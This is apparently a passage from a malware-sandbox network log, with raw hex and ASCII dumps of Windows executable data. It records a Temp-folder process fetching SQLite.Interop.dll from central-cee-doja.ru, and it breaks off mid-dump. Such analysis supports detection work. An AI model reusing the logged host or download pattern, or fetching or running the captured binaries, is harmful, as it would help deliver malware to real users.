2023-11-18 09:02:42 UTC	10303	IN	Data Raw: 61 67 65 57 00 00 1f 02 47 65 74 44 69 73 6b 46 72 65 65 53 70 61 63 65 41 00 56 02 47 65 74 4c 61 73 74 45 72 72 6f 72 00 00 37 02 47 65 74 46 69 6c 65 41 74 74 72 69 62 75 74 65 73 41 00 00 39 02 47 65 74 46 69 6c 65 41 74 74 72 69 62 75 74 65 73 45 78 57 00 00 fd 03 4f 75 74 70 75 74 44 65 62 75 67 53 74 72 69 6e 67 57 00 00 9b 01 46 6c 75 73 68 56 69 65 77 4f 66 46 69 6c 65 00 ba 00 43 72 65 61 74 65 46 69 6c 65 41 00 a8 03 4c 6f 61 64 4c 69 62 72 61 72 79 41 00 00 10 06 6c 73 74 72 63 61 74 57 00 00 bc 05 57 61 69 74 46 6f 72 53 69 6e 67 6c 65 4f 62 6a 65 63 74 45 78 00 08 01 44 65 6c 65 74 65 46 69 6c 65 41 00 0b 01 44 65 6c 65 74 65 46 69 6c 65 57 00 3f 03 48 65 61 70 52 65 41 6c 6c 6f 63 00 7f 00 43 6c 6f 73 65 48 61 6e 64 6c 65 00 d7 02 47 65 74 Data Ascii: ageWGetDiskFreeSpaceAVGetLastError7GetFileAttributesA9GetFileAttributesExWOutputDebugStringWFlushViewOfFileCreateFileALoadLibraryAlstrcatWWaitForSingleObjectExDeleteFileADeleteFileW?HeapReAllocCloseHandleGet
2023-11-18 09:02:42 UTC	10319	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 47 16 80 01 00 00 00 00 00 00 00 00 00 00 00 03 00 00 00 05 08 80 00 58 bf 16 80 01 00 00 00 00 00 00 00 00 00 00 00 d0 f2 0d 80 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 47 16 80 01 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 01 08 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 49 16 80 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 08 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 49 16 80 01 00 00 00 00 00 00 00 00 00 00 00 01 Data Ascii: HGXHGII
2023-11-18 09:02:43 UTC	10335	IN	Data Raw: 03 00 7a c5 03 00 fc be 17 00 80 c5 03 00 2e c6 03 00 10 bf 17 00 2e c6 03 00 82 c6 03 00 24 bf 17 00 82 c6 03 00 9c c8 03 00 3c bf 17 00 9c c8 03 00 eb c8 03 00 50 bf 17 00 eb c8 03 00 00 c9 03 00 60 bf 17 00 10 c9 03 00 3c c9 03 00 70 bf 17 00 3c c9 03 00 72 ca 03 00 7c bf 17 00 72 ca 03 00 7b ca 03 00 a0 bf 17 00 7b ca 03 00 5e cb 03 00 b0 bf 17 00 d0 cb 03 00 ec cb 03 00 d4 bf 17 00 ec cb 03 00 fc cb 03 00 dc bf 17 00 fc cb 03 00 89 cc 03 00 f0 bf 17 00 89 cc 03 00 96 cc 03 00 08 c0 17 00 96 cc 03 00 9c cc 03 00 18 c0 17 00 b0 cc 03 00 47 cd 03 00 28 c0 17 00 50 cd 03 00 73 cd 03 00 38 c0 17 00 73 cd 03 00 e0 cd 03 00 48 c0 17 00 e0 cd 03 00 f0 cd 03 00 5c c0 17 00 00 ce 03 00 30 ce 03 00 6c c0 17 00 30 ce 03 00 0b cf 03 00 80 c0 17 00 0b cf 03 00 21 Data Ascii: z..$<P`<p<r\|r{{^G(Ps8sH\0l0!
2023-11-18 09:02:43 UTC	10351	IN	Data Raw: 07 00 24 1f 18 00 20 e2 07 00 9a e2 07 00 2c 1f 18 00 a0 e2 07 00 34 e3 07 00 3c 1f 18 00 40 e3 07 00 d3 e3 07 00 48 1f 18 00 e0 e3 07 00 30 e4 07 00 60 1f 18 00 30 e4 07 00 ef e4 07 00 74 1f 18 00 ef e4 07 00 07 e5 07 00 88 1f 18 00 90 e6 07 00 cf e6 07 00 98 1f 18 00 cf e6 07 00 be e7 07 00 a8 1f 18 00 be e7 07 00 d3 e7 07 00 c0 1f 18 00 10 e8 07 00 69 e8 07 00 d0 1f 18 00 70 e8 07 00 a9 e8 07 00 dc 1f 18 00 a9 e8 07 00 c5 e9 07 00 e4 1f 18 00 c5 e9 07 00 e0 e9 07 00 fc 1f 18 00 e0 e9 07 00 e1 e9 07 00 14 20 18 00 f0 e9 07 00 18 ea 07 00 24 20 18 00 20 ea 07 00 1e eb 07 00 2c 20 18 00 30 eb 07 00 d6 eb 07 00 3c 20 18 00 e0 eb 07 00 23 f0 07 00 44 20 18 00 30 f0 07 00 51 f0 07 00 54 20 18 00 51 f0 07 00 7a f0 07 00 5c 20 18 00 7a f0 07 00 82 f0 07 00 70 Data Ascii: $ ,4<@H0`0tip $ , 0< #D 0QT Qz\ zp
2023-11-18 09:02:43 UTC	10367	IN	Data Raw: 18 00 c0 f1 0d 00 67 f2 0d 00 20 80 18 00 70 f2 0d 00 c1 f2 0d 00 30 80 18 00 d0 f2 0d 00 10 f4 0d 00 3c 80 18 00 10 f4 0d 00 8a f6 0d 00 50 80 18 00 8a f6 0d 00 9c f6 0d 00 64 80 18 00 f0 f6 0d 00 c8 fb 0d 00 74 80 18 00 d0 fb 0d 00 12 fc 0d 00 84 80 18 00 20 fc 0d 00 62 fc 0d 00 8c 80 18 00 70 fc 0d 00 b2 fc 0d 00 94 80 18 00 c0 fc 0d 00 86 fd 0d 00 9c 80 18 00 90 fd 0d 00 ef fd 0d 00 ac 80 18 00 00 fe 0d 00 31 ff 0d 00 b4 80 18 00 40 ff 0d 00 77 00 0e 00 c8 80 18 00 80 00 0e 00 ec 00 0e 00 dc 80 18 00 00 01 0e 00 91 02 0e 00 e8 80 18 00 a0 02 0e 00 f4 02 0e 00 fc 80 18 00 f4 02 0e 00 bd 05 0e 00 0c 81 18 00 bd 05 0e 00 ca 05 0e 00 28 81 18 00 d0 05 0e 00 10 07 0e 00 38 81 18 00 20 07 0e 00 85 07 0e 00 4c 81 18 00 85 07 0e 00 6a 09 0e 00 60 81 18 00 6a Data Ascii: g p0<Pdt bp1@w(8 Lj`j
2023-11-18 09:02:43 UTC	10383	IN	Data Raw: 12 00 1d e7 12 00 8c e0 18 00 30 e7 12 00 e0 e7 12 00 98 e0 18 00 f0 e7 12 00 38 ea 12 00 ac e0 18 00 40 ea 12 00 4d ea 12 00 c8 e0 18 00 4d ea 12 00 7f ea 12 00 d0 e0 18 00 7f ea 12 00 62 eb 12 00 e8 e0 18 00 62 eb 12 00 6d eb 12 00 00 e1 18 00 6d eb 12 00 88 eb 12 00 10 e1 18 00 90 eb 12 00 7d ec 12 00 24 e1 18 00 90 ec 12 00 2b ef 12 00 34 e1 18 00 40 ef 12 00 ee f0 12 00 50 e1 18 00 00 f1 12 00 8f f2 12 00 68 e1 18 00 a0 f2 12 00 df f2 12 00 84 e1 18 00 df f2 12 00 f5 f2 12 00 94 e1 18 00 f5 f2 12 00 10 f4 12 00 a8 e1 18 00 10 f4 12 00 1e f4 12 00 c0 e1 18 00 1e f4 12 00 60 f4 12 00 d0 e1 18 00 70 f4 12 00 78 f4 12 00 e0 e1 18 00 78 f4 12 00 90 f7 12 00 ec e1 18 00 90 f7 12 00 a9 f7 12 00 14 e2 18 00 b0 f7 12 00 08 f8 12 00 24 e2 18 00 10 f8 12 00 e4 Data Ascii: 08@MMbbmm}$+4@Ph`pxx$
2023-11-18 09:02:43 UTC	10399	IN	Data Raw: c8 a4 d0 a4 d8 a4 e0 a4 e8 a4 f0 a4 f8 a4 00 a5 08 a5 10 a5 18 a5 20 a5 28 a5 08 a6 b0 a6 b8 a6 c0 a6 c8 a6 d0 a6 d8 a6 e0 a6 e8 a6 00 00 00 50 17 00 18 00 00 00 58 a8 60 a8 68 a8 70 a8 08 a9 10 a9 18 a9 00 00 00 60 17 00 f8 00 00 00 70 a6 78 a6 80 a6 90 a6 98 a6 a0 a6 a8 a6 b0 a6 b8 a6 c0 a6 e0 a6 f0 a6 f8 a6 00 a7 10 a7 18 a7 20 a7 30 a7 38 a7 40 a7 50 a7 58 a7 60 a7 70 a7 78 a7 80 a7 90 a7 98 a7 50 a9 58 a9 60 a9 68 a9 70 a9 78 a9 80 a9 38 ab 58 ab 98 ab a0 ab a8 ab b0 ab b8 ab c0 ab c8 ab d0 ab d8 ab e0 ab e8 ab f0 ab f8 ab 00 ac 08 ac 10 ac 18 ac 20 ac 28 ac 30 ac 38 ac 40 ac 48 ac 58 ac 60 ac 68 ac 70 ac 78 ac 00 ad 08 ad 10 ad 18 ad 20 ad 28 ad 30 ad 38 ad 40 ad 48 ad 50 ad 58 ad 08 ae b0 ae b8 ae c0 ae c8 ae d0 ae d8 ae e0 ae e8 ae f0 ae f8 ae 00 Data Ascii: (PX`hp`px 08@PX`pxPX`hpx8X (08@HX`hpx (08@HPX
2023-11-18 09:02:43 UTC	10415	IN	Data Raw: a5 b2 a2 25 b2 c8 17 35 6e 30 1d 06 03 55 1d 0e 04 16 04 14 36 44 86 8e a4 ba b0 66 be bc 28 2d 1d 44 36 dd e3 6a 7a bc 30 71 06 03 55 1d 1f 04 6a 30 68 30 32 a0 30 a0 2e 86 2c 68 74 74 70 3a 2f 2f 63 72 6c 33 2e 64 69 67 69 63 65 72 74 2e 63 6f 6d 2f 73 68 61 32 2d 61 73 73 75 72 65 64 2d 74 73 2e 63 72 6c 30 32 a0 30 a0 2e 86 2c 68 74 74 70 3a 2f 2f 63 72 6c 34 2e 64 69 67 69 63 65 72 74 2e 63 6f 6d 2f 73 68 61 32 2d 61 73 73 75 72 65 64 2d 74 73 2e 63 72 6c 30 81 85 06 08 2b 06 01 05 05 07 01 01 04 79 30 77 30 24 06 08 2b 06 01 05 05 07 30 01 86 18 68 74 74 70 3a 2f 2f 6f 63 73 70 2e 64 69 67 69 63 65 72 74 2e 63 6f 6d 30 4f 06 08 2b 06 01 05 05 07 30 02 86 43 68 74 74 70 3a 2f 2f 63 61 63 65 72 74 73 2e 64 69 67 69 63 65 72 74 2e 63 6f 6d 2f 44 69 67 Data Ascii: %5n0U6Df(-D6jz0qUj0h020.,http://crl3.digicert.com/sha2-assured-ts.crl020.,http://crl4.digicert.com/sha2-assured-ts.crl0+y0w0$+0http://ocsp.digicert.com0O+0Chttp://cacerts.digicert.com/Dig

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.4	49751	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:02:40 UTC	8695	OUT	GET /dlls/x64/SQLite.Interop.dll HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:02:41 UTC	8695	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:02:41 GMT Content-Type: application/x-msdos-program Content-Length: 1763632 Connection: close Last-Modified: Tue, 02 Nov 2021 17:47:38 GMT ETag: "1ae930-5cfd1e3a66280" Accept-Ranges: bytes CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=T6JLnSU3G%2F%2Bs5Zx%2Bf%2BfZFKUAmblQ7ePKRRhTxN0CY1udZJ6Tpu1c1J4K9WjY9KAzb5ibS6WocZmX8YC8Lsty8spk2xDs74Hi54Z%2FL6qmSeW1x%2FzdmME8N485BPKLxud7Fb6L5nfQ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0932bfad6c8d-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:02:41 UTC	8696	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 7f 7b be a1 3b 1a d0 f2 3b 1a d0 f2 3b 1a d0 f2 8f 86 21 f2 2f 1a d0 f2 8f 86 23 f2 bb 1a d0 f2 8f 86 22 f2 1e 1a d0 f2 00 44 d3 f3 3c 1a d0 f2 00 44 d5 f3 2e 1a d0 f2 00 44 d4 f3 2b 1a d0 f2 e6 e5 1b f2 33 1a d0 f2 25 48 43 f2 38 1a d0 f2 3b 1a d1 f2 a2 1a d0 f2 ac 44 d8 f3 3a 1a d0 f2 ac 44 d0 f3 3a 1a d0 f2 a9 44 2f f2 3a 1a d0 f2 ac 44 d2 f3 3a 1a d0 f2 52 69 63 68 3b 1a d0 Data Ascii: MZ@!L!This program cannot be run in DOS mode.${;;;!/#"D<D.D+3%HC8;D:D:D/:D:Rich;
2023-11-18 09:02:41 UTC	8696	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 67 66 69 64 73 00 00 9c 00 00 00 00 c0 1a 00 00 02 00 00 00 86 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 94 08 00 00 00 d0 1a 00 00 0a 00 00 00 88 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 28 15 00 00 00 e0 1a 00 00 16 00 00 00 92 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: @@.gfids@@.rsrc@@.reloc(@B
2023-11-18 09:02:41 UTC	8698	IN	Data Raw: 24 50 4c 8b c8 48 89 4c 24 30 4c 8b c7 48 8d 4c 24 60 48 89 4c 24 28 33 c9 48 89 5c 24 20 ff 15 d2 0e 15 00 48 8b 5c 24 68 48 83 c4 40 5f c3 cc cc cc 40 53 56 57 48 83 ec 40 48 8b d9 ff 15 a3 0e 15 00 48 8b b3 f8 00 00 00 33 ff 45 33 c0 48 8d 54 24 60 48 8b ce ff 15 91 0e 15 00 48 85 c0 74 39 48 83 64 24 38 00 48 8d 4c 24 68 48 8b 54 24 60 4c 8b c8 48 89 4c 24 30 4c 8b c6 48 8d 4c 24 70 48 89 4c 24 28 33 c9 48 89 5c 24 20 ff 15 62 0e 15 00 ff c7 83 ff 02 7c b1 48 83 c4 40 5f 5e 5b c3 cc cc cc 48 83 ec 28 85 d2 74 39 83 ea 01 74 28 83 ea 01 74 16 83 fa 01 74 0a b8 01 00 00 00 48 83 c4 28 c3 e8 16 04 00 00 eb 05 e8 e7 03 00 00 0f b6 c0 48 83 c4 28 c3 49 8b d0 48 83 c4 28 e9 0f 00 00 00 4d 85 c0 0f 95 c1 48 83 c4 28 e9 2c 01 00 00 48 89 5c 24 08 48 89 74 24 Data Ascii: $PLHL$0LHL$`HL$(3H\$ H\$hH@_@SVWH@HH3E3HT$`HHt9Hd$8HL$hHT$`LHL$0LHL$pHL$(3H\$ b\|H@_^[H(t9t(ttH(H(IH(MH(,H\$Ht$
2023-11-18 09:02:41 UTC	8699	IN	Data Raw: 00 00 cc cc cc 48 83 ec 28 e8 5b 07 00 00 85 c0 74 10 48 8d 0d 2c 6e 19 00 48 83 c4 28 e9 a7 ac 00 00 e8 f2 a1 00 00 85 c0 75 05 e8 cd a1 00 00 48 83 c4 28 c3 48 83 ec 28 33 c9 e8 d1 ae 00 00 48 83 c4 28 e9 34 0f 00 00 40 53 48 83 ec 20 0f b6 05 1f 6e 19 00 85 c9 bb 01 00 00 00 0f 44 c3 88 05 0f 6e 19 00 e8 36 05 00 00 e8 91 0e 00 00 84 c0 75 04 32 c0 eb 14 e8 48 ae 00 00 84 c0 75 09 33 c9 e8 d5 0e 00 00 eb ea 8a c3 48 83 c4 20 5b c3 cc cc cc 48 89 5c 24 08 55 48 8b ec 48 83 ec 40 8b d9 83 f9 01 0f 87 a6 00 00 00 e8 b7 06 00 00 85 c0 74 2b 85 db 75 27 48 8d 0d 84 6d 19 00 e8 3f ac 00 00 85 c0 74 04 32 c0 eb 7a 48 8d 0d 88 6d 19 00 e8 2b ac 00 00 85 c0 0f 94 c0 eb 67 48 8b 15 b5 25 19 00 49 83 c8 ff 8b c2 b9 40 00 00 00 83 e0 3f 2b c8 b0 01 49 d3 c8 4c 33 Data Ascii: H([tH,nH(uH(H(3H(4@SH nDn6u2Hu3H [H\$UHH@t+u'Hm?t2zHm+gH%I@?+IL3
2023-11-18 09:02:41 UTC	8700	IN	Data Raw: 83 ec 20 48 8d 1d 32 5e 17 00 48 8d 35 2b 5e 17 00 eb 16 48 8b 3b 48 85 ff 74 0a 48 8b cf e8 1d 00 00 00 ff d7 48 83 c3 08 48 3b de 72 e5 48 8b 5c 24 30 48 8b 74 24 38 48 83 c4 20 5f c3 cc cc 48 ff 25 8d 05 15 00 cc 48 89 5c 24 10 48 89 7c 24 18 55 48 8b ec 48 83 ec 20 83 65 e8 00 33 c9 33 c0 c7 05 f4 20 19 00 02 00 00 00 0f a2 44 8b c1 c7 05 e1 20 19 00 01 00 00 00 81 f1 63 41 4d 44 44 8b ca 44 8b d2 41 81 f1 65 6e 74 69 41 81 f2 69 6e 65 49 41 81 f0 6e 74 65 6c 45 0b d0 44 8b db 44 8b 05 97 68 19 00 41 81 f3 41 75 74 68 45 0b d9 8b d3 44 0b d9 81 f2 47 65 6e 75 33 c9 8b f8 44 0b d2 b8 01 00 00 00 0f a2 89 45 f0 44 8b c9 44 89 4d f8 8b c8 89 5d f4 89 55 fc 45 85 d2 75 52 48 83 0d 79 20 19 00 ff 41 83 c8 04 25 f0 3f ff 0f 44 89 05 45 68 19 00 3d c0 06 01 Data Ascii: H2^H5+^H;HtHHH;rH\$0Ht$8H _H%H\$H\|$UHH e33 D cAMDDDAentiAineIAntelEDDhAAuthEDGenu3DEDDM]UEuRHy A%?DEh=
2023-11-18 09:02:41 UTC	8702	IN	Data Raw: 0f 2b 41 a0 0f 2b 49 b0 0f 10 44 0a c0 0f 10 4c 0a d0 0f 18 84 0a 40 02 00 00 0f 2b 41 c0 0f 2b 49 d0 0f 10 44 0a e0 0f 10 4c 0a f0 75 9d 0f ae f8 e9 38 ff ff ff 0f 1f 44 00 00 49 03 c8 0f 10 44 0a f0 48 83 e9 10 49 83 e8 10 f6 c1 0f 74 17 48 8b c1 48 83 e1 f0 0f 10 c8 0f 10 04 0a 0f 11 08 4c 8b c1 4d 2b c3 4d 8b c8 49 c1 e9 07 74 68 0f 29 01 eb 0d 66 0f 1f 44 00 00 0f 29 41 10 0f 29 09 0f 10 44 0a f0 0f 10 4c 0a e0 48 81 e9 80 00 00 00 0f 29 41 70 0f 29 49 60 0f 10 44 0a 50 0f 10 4c 0a 40 49 ff c9 0f 29 41 50 0f 29 49 40 0f 10 44 0a 30 0f 10 4c 0a 20 0f 29 41 30 0f 29 49 20 0f 10 44 0a 10 0f 10 0c 0a 75 ae 0f 29 41 10 49 83 e0 7f 0f 28 c1 4d 8b c8 49 c1 e9 04 74 1a 66 66 0f 1f 84 00 00 00 00 00 0f 11 01 48 83 e9 10 0f 10 04 0a 49 ff c9 75 f0 49 83 e0 0f Data Ascii: +A+IDL@+A+IDLu8DIDHItHHLM+MIth)fD)A)DLH)Ap)I`DPL@I)AP)I@D0L )A0)I Du)AI(MItffHIuI
2023-11-18 09:02:41 UTC	8703	IN	Data Raw: 8b c2 48 8b d7 48 8b f9 49 8b c8 f3 aa 48 8b fa 49 8b c3 c3 66 66 66 66 66 66 0f 1f 84 00 00 00 00 00 0f 11 01 4c 03 c1 48 83 c1 10 48 83 e1 f0 4c 2b c1 4d 8b c8 49 c1 e9 07 74 36 66 0f 1f 44 00 00 0f 29 01 0f 29 41 10 48 81 c1 80 00 00 00 0f 29 41 a0 0f 29 41 b0 49 ff c9 0f 29 41 c0 0f 29 41 d0 0f 29 41 e0 66 0f 29 41 f0 75 d4 49 83 e0 7f 4d 8b c8 49 c1 e9 04 74 13 0f 1f 80 00 00 00 00 0f 11 01 48 83 c1 10 49 ff c9 75 f4 49 83 e0 0f 74 06 41 0f 11 44 08 f0 49 8b c3 c3 7e 2a 00 00 7b 2a 00 00 a7 2a 00 00 77 2a 00 00 84 2a 00 00 94 2a 00 00 a4 2a 00 00 74 2a 00 00 ac 2a 00 00 88 2a 00 00 c0 2a 00 00 b0 2a 00 00 80 2a 00 00 90 2a 00 00 a0 2a 00 00 70 2a 00 00 c8 2a 00 00 49 8b d1 4c 8d 0d a6 d5 ff ff 43 8b 84 81 0c 2a 00 00 4c 03 c8 49 03 c8 49 8b c3 41 ff Data Ascii: HHIHIffffffLHHL+MIt6fD))AH)A)AI)A)A)Af)AuIMItHIuItADI~{w*t****pILC*LIIA
2023-11-18 09:02:41 UTC	8704	IN	Data Raw: f1 d0 88 19 00 eb 2d 4c 8b 05 2b 11 19 00 eb b1 b9 40 00 00 00 41 8b c0 83 e0 3f 2b c8 48 d3 cf 48 8d 0d 12 d1 ff ff 49 33 f8 4a 87 bc f1 d0 88 19 00 33 c0 48 8b 5c 24 50 48 8b 6c 24 58 48 8b 74 24 60 48 83 c4 20 41 5f 41 5e 41 5d 41 5c 5f c3 48 89 5c 24 08 57 48 83 ec 20 48 8b f9 4c 8d 0d e4 f6 14 00 b9 04 00 00 00 4c 8d 05 d0 f6 14 00 48 8d 15 d1 f6 14 00 e8 0c fe ff ff 48 8b d8 48 85 c0 74 0f 48 8b c8 e8 a8 ef ff ff 48 8b cf ff d3 eb 06 ff 15 07 f4 14 00 48 8b 5c 24 30 48 83 c4 20 5f c3 48 89 5c 24 08 57 48 83 ec 20 8b d9 4c 8d 0d a9 f6 14 00 b9 05 00 00 00 4c 8d 05 95 f6 14 00 48 8d 15 96 f6 14 00 e8 b9 fd ff ff 48 8b f8 48 85 c0 74 0e 48 8b c8 e8 55 ef ff ff 8b cb ff d7 eb 08 8b cb ff 15 cb f3 14 00 48 8b 5c 24 30 48 83 c4 20 5f c3 48 89 5c 24 08 57 Data Ascii: -L+@A?+HHI3J3H\$PHl$XHt$`H A_A^A]A\_H\$WH HLLHHHtHHH\$0H _H\$WH LLHHHtHUH\$0H _H\$W
2023-11-18 09:02:41 UTC	8706	IN	Data Raw: ca 49 c1 e9 34 f2 0f 58 15 fb fc 14 00 f2 0f 10 1d 5b fc 14 00 66 0f e6 c2 f2 0f 10 0d 5f fc 14 00 f3 0f e6 d0 f2 0f 59 da f2 0f 5c e3 f2 0f 59 ca 66 0f 7e c0 66 0f 28 c4 f2 0f 5c c1 f2 0f 10 1d 4b fc 14 00 66 48 0f 7e c1 f2 0f 10 2d 4e fc 14 00 48 d1 e1 48 c1 e9 35 4c 2b c9 49 83 f9 0f 7e 28 66 0f 28 cc f2 0f 59 da f2 0f 59 ea f2 0f 5c e3 f2 0f 5c cc f2 0f 5c cb f2 0f 5c e9 66 0f 28 c4 66 0f 28 cd f2 0f 5c c5 f2 0f 5c e0 f2 0f 5c e1 66 0f 28 d8 66 0f 28 d0 f2 0f 59 d0 0f ba e0 00 0f 82 98 00 00 00 f2 0f 10 1d 70 39 15 00 f2 0f 59 da f2 0f 10 2d 34 39 15 00 f2 0f 11 64 24 30 66 0f 28 ca f2 0f 59 ca f2 0f 11 44 24 40 f2 0f 59 ea 66 0f 28 e0 f2 0f 58 1d 30 39 15 00 f2 0f 59 ca f2 0f 59 da f2 0f 59 e2 f2 0f 58 2d ec 38 15 00 f2 0f 59 ea f2 0f 58 1d 00 39 15 Data Ascii: I4X[f_Y\Yf~f(\KfH~-NHH5L+I~(f(YY\\\\f(f(\\\f(f(Yp9Y-49d$0f(YD$@Yf(X09YYYX-8YX9
2023-11-18 09:02:41 UTC	8707	IN	Data Raw: 14 00 0f 83 1f 03 00 00 66 0f 28 d0 f2 0f 59 15 63 f8 14 00 66 0f 28 e0 4d 8b ca 49 c1 e9 34 f2 0f 58 15 58 f8 14 00 f2 0f 10 1d c8 f7 14 00 66 0f e6 c2 f2 0f 10 0d cc f7 14 00 f3 0f e6 d0 f2 0f 59 da f2 0f 5c e3 f2 0f 59 ca 66 0f 7e c0 66 0f 28 c4 f2 0f 5c c1 f2 0f 10 1d b8 f7 14 00 66 48 0f 7e c1 f2 0f 10 2d bb f7 14 00 48 d1 e1 48 c1 e9 35 4c 2b c9 49 83 f9 0f 7e 28 66 0f 28 cc f2 0f 59 da f2 0f 59 ea f2 0f 5c e3 f2 0f 5c cc f2 0f 5c cb f2 0f 5c e9 66 0f 28 c4 66 0f 28 cd f2 0f 5c c5 f2 0f 5c e0 f2 0f 5c e1 66 0f 28 d8 66 0f 28 d0 f2 0f 59 d0 0f ba e0 00 0f 83 95 00 00 00 f2 0f 10 1d fd 33 15 00 f2 0f 59 da f2 0f 10 2d c1 33 15 00 f2 0f 11 64 24 20 66 0f 28 ca f2 0f 59 ca f2 0f 11 44 24 30 f2 0f 59 ea 66 0f 28 e0 f2 0f 58 1d bd 33 15 00 f2 0f 59 ca f2 Data Ascii: f(Ycf(MI4XXfY\Yf~f(\fH~-HH5L+I~(f(YY\\\\f(f(\\\f(f(Y3Y-3d$ f(YD$0Yf(X3Y
2023-11-18 09:02:41 UTC	8708	IN	Data Raw: 14 00 8b c8 ff 15 bc e4 14 00 cc e8 16 9c 00 00 48 89 98 c0 03 00 00 e8 32 a4 00 00 84 c0 74 12 b9 01 00 00 00 e8 60 a3 00 00 85 c0 0f 94 c0 88 43 20 48 8b 3b 48 8b 5b 08 48 8b cf ff 15 7c e5 14 00 48 8b cb ff d7 8b c8 e8 bc 01 00 00 90 8b c8 e8 48 7c 00 00 90 48 8b 5c 24 30 48 83 c4 20 5f c3 48 89 5c 24 08 57 48 83 ec 20 8b d9 e8 47 9c 00 00 48 85 c0 75 09 8b cb ff 15 46 e4 14 00 cc 48 8b b8 c0 03 00 00 48 85 ff 75 09 8b cb ff 15 31 e4 14 00 cc 80 7f 20 00 74 05 e8 35 a3 00 00 48 8b 4f 10 48 8d 41 ff 48 83 f8 fd 77 06 ff 15 31 e2 14 00 48 8b 4f 18 48 8d 41 ff 48 83 f8 fd 77 09 8b d3 ff 15 03 e4 14 00 cc 8b cb ff 15 f2 e3 14 00 cc cc 48 89 5c 24 08 48 89 74 24 10 57 48 83 ec 20 48 8b f2 48 8b f9 ba 28 00 00 00 8d 4a d9 e8 3a 8a 00 00 33 c9 48 8b d8 e8 d8 Data Ascii: H2t`C H;H[H\|HH\|H\$0H _H\$WH GHuFHHu1 t5HOHAHw1HOHAHwH\$Ht$WH HH(J:3H
2023-11-18 09:02:41 UTC	8709	IN	Data Raw: 5c 24 10 48 89 74 24 20 55 48 8b ec 48 83 ec 70 48 63 d9 48 8d 4d e0 e8 72 fd ff ff 81 fb 00 01 00 00 73 38 48 8d 55 e8 8b cb e8 ef fd ff ff 84 c0 74 0f 48 8b 45 e8 48 8b 88 18 01 00 00 0f b6 1c 19 80 7d f8 00 0f 84 dc 00 00 00 48 8b 45 e0 83 a0 a8 03 00 00 fd e9 cc 00 00 00 33 c0 66 89 45 10 88 45 12 48 8b 45 e8 83 78 08 01 7e 28 8b f3 48 8d 55 e8 c1 fe 08 40 0f b6 ce e8 41 a0 00 00 85 c0 74 12 40 88 75 10 b9 02 00 00 00 88 5d 11 c6 45 12 00 eb 17 e8 92 37 00 00 b9 01 00 00 00 c7 00 2a 00 00 00 88 5d 10 c6 45 11 00 48 8b 55 e8 4c 8d 4d 10 33 c0 c7 44 24 40 01 00 00 00 66 89 45 20 41 b8 00 02 00 00 88 45 22 8b 42 0c 48 8b 92 38 01 00 00 89 44 24 38 48 8d 45 20 c7 44 24 30 03 00 00 00 48 89 44 24 28 89 4c 24 20 48 8d 4d e8 e8 75 a4 00 00 85 c0 0f 84 41 ff Data Ascii: \$Ht$ UHHpHcHMrs8HUtHEH}HE3fEEHEx~(HU@At@u]E7*]EHULM3D$@fE AE"BH8D$8HE D$0HD$(L$ HMuA
2023-11-18 09:02:41 UTC	8711	IN	Data Raw: 66 0f 2f 25 fd f0 14 00 72 5c c7 44 24 40 01 00 00 00 0f 57 c0 f2 0f 11 44 24 38 ba 1f 00 00 00 f2 0f 11 74 24 30 48 8d 0d 38 01 16 00 c7 44 24 28 22 00 00 00 c7 44 24 20 01 00 00 00 44 8d 4a e4 4d 85 d2 74 14 49 b8 00 00 00 00 00 00 f0 ff e8 68 83 00 00 e9 a8 02 00 00 49 b8 00 00 00 00 00 00 f0 7f eb ea 66 0f 2f 25 87 f0 14 00 0f 82 15 01 00 00 f2 0f 10 0d f1 ef 14 00 48 8d 84 24 a0 00 00 00 f2 0f 10 1d 41 f0 14 00 0f 28 c4 f2 0f 10 15 66 f0 14 00 48 89 44 24 38 48 8d 84 24 98 00 00 00 48 89 44 24 30 48 8d 84 24 90 00 00 00 48 89 44 24 28 f2 0f 11 4c 24 20 f2 0f 10 0d 29 2d 17 00 e8 54 02 00 00 44 